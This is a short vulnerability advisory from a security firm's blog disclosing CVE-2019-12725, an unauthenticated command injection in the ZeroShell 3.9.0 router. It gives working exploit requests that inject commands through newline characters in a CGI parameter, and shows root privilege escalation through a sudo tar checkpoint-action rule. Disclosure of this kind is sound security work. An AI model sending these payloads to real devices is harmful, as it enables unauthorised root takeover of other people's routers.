Cybersecurity blog header

ZeroShell Vulnerability – CVE-2019-12725

Product: ZeroShell
Publication Date: 17/07/2019
Author: Juan Manuel Fernandez (@TheXC3LL) – Tarlogic

Zeroshell vulnerability – CVE-2019-12725 RCE as root

The latest version of ZeroShell linux router (3.9.0) is vulnerable to RCE because some parameters inside a script are used without a properly sanitization. This issue can be abused via new-line characters:

Example of vulnerable parameter:

/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509view&User=Admin&x509type=’%0Auname -a%0A’

Additionally the Apache user can execute the “tar” command as root (/etc/sudoers):

(…)

apache ALL= NOPASSWD: /bin/tar

(…)

Zeroshell exploit

This ZeroShell vulnerability can be abused in order to elevate privileges via the RCE:

/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=’%0A/etc/sudo tar -cf /dev/null /dev/null –checkpoint=1 –checkpoint-action=exec=id%0A’

uid=0(root) gid=0(root) groups=0(root)

A security update will be released in the next days

Discover our work and cybersecurity services.

Leave a comment